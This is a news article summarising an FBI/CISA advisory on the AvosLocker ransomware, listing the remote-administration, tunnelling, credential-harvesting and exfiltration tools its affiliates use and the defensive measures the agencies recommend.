From Legit Software to Ransomware: AvosLocker’s Stealth Tactics Exposed

In a joint communique from the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA), fresh insights were furnished about the tools employed by malefactors associated with the AvosLocker ransomware, which the FBI had previously reported on a few weeks prior.

It has been discerned that AvosLocker affiliates leverage legitimate software and open-source codes for remote system administration and data exfiltration from corporate networks.

The FBI documented the utilization of customizable PowerShell, web shells, and batch scripts for network traversal, privilege escalation, and deactivation of security systems.

Highlighted in the updated agency report are tools such as:

• Remote system administration tools—Splashtop Streamer, Tactical RMM, PuTTy, AnyDesk, PDQ Deploy, and Atera Agent—as backdoor access vectors [T1133].
• Scripts to execute legitimate native Windows tools [T1047], such as PsExec and Nltest.
• Open-source networking tunneling tools [T1572] Ligolo[1] and Chisel[2].
• Cobalt Strike and Sliver[3] for command and control (C2).
• Lazagne and Mimikatz for harvesting credentials [T1555].
• FileZilla and Rclone for data exfiltration.
• Notepad++, RDP Scanner, and 7zip.

Another recurrent component of their onslaughts is malicious software dubbed “NetMonitor.exe”. This element masquerades as a legitimate process and functions as a reverse proxy, enabling adversaries to access the compromised network. The FBI specialists even crafted a distinct YARA rule to detect NetMonitor within networks.

“AvosLocker affiliates have compromised organizations across multiple critical infrastructure sectors in the United States, affecting Windows, Linux, and VMware ESXi environments. AvosLocker affiliates compromise organizations’ networks by using legitimate software and open-source remote system administration tools. AvosLocker affiliates then use exfiltration-based data extortion tactics with threats of leaking and/or publishing stolen data,” elucidate experts from the FBI and CISA.

Agencies advocate for organizations to integrate advanced application control mechanisms, inclusive of whitelists, and to thwart the usage of portable versions of unauthorized utilities.

Among the best practices for defense against threats are limiting the use of the Remote Desktop Protocol (RDP), implementing multi-factor authentication (MFA), and applying the principle of least privilege. It is advised for organizations to disable the command line and PowerShell scripting support for users not necessitating them in their workflow.

Consistent software and code updates, deploying lengthy passwords, storing them in hashed formats, and network segmentation remain enduring recommendations from security pundits.

The current guidelines on AvosLocker complement the previous one presented by the FBI in March of the preceding year. It was then noted that in certain attacks, the AvosLocker ransomware exploited vulnerabilities on local Microsoft Exchange servers.